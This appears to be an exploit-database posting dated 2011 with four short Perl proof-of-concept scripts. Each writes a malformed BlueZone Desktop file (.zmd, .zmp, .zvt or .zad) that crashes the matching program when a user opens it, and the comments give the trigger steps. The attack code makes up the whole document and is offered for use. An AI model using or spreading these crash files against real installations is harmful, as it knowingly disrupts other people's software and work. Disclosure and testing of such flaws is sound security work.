1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 |
# Exploit Title: BlueZone Desktop Malformed .zmd file Local Denial of Service # Date: 10-24-11 # Author: Silent Dream # Software Link: http://www.rocketsoftware.com/bluezone/downloads/desktop-free-trial # Version: Latest # Tested on: Windows XP SP3 #To trigger: Run this script, double click file to open with bzmd.exe, program dies. my $file = "bluez.zmd"; my $head = "BZMD215AK"; my $junk = "A" x 20; open($File, ">$file"); print $File $head.$junk; close($FILE); exit(); # Exploit Title: BlueZone Desktop Malformed .zmp file Local Denial of Service # Date: 10-24-11 # Author: Silent Dream # Software Link: http://www.rocketsoftware.com/bluezone/downloads/desktop-free-trial # Version: Latest # Tested on: Windows XP SP3 #To trigger: Run this script, double click file to open with bzmp.exe, program dies. my $file = "bluez.zmp"; my $head = "BZMP215AK"; my $junk = "A" x 20; open($File, ">$file"); print $File $head.$junk; close($FILE); exit(); # Exploit Title: BlueZone Desktop Malformed .zvt file Local Denial of Service # Date: 10-24-11 # Author: Silent Dream # Software Link: http://www.rocketsoftware.com/bluezone/downloads/desktop-free-trial # Version: Latest # Tested on: Windows XP SP3 #To trigger: Run this script, double click file to open with bzvt.exe, program dies. my $file = "bluez.zvt"; my $head = "BZVT100AK"; my $junk = "A" x 20; open($File, ">$file"); print $File $head.$junk; close($FILE); exit(); # Exploit Title: BlueZone Desktop Malformed .zad file Local Denial of Service # Date: 10-24-11 # Author: Silent Dream # Software Link: http://www.rocketsoftware.com/bluezone/downloads/desktop-free-trial # Version: Latest # Tested on: Windows XP SP3 #To trigger: Run this script, double click file to open with bzad.exe, program dies. my $file = "bluez.zad"; my $head = "BZAD200BK"; my $junk = "A" x 20; open($File, ">$file"); print $File $head.$junk; close($FILE); |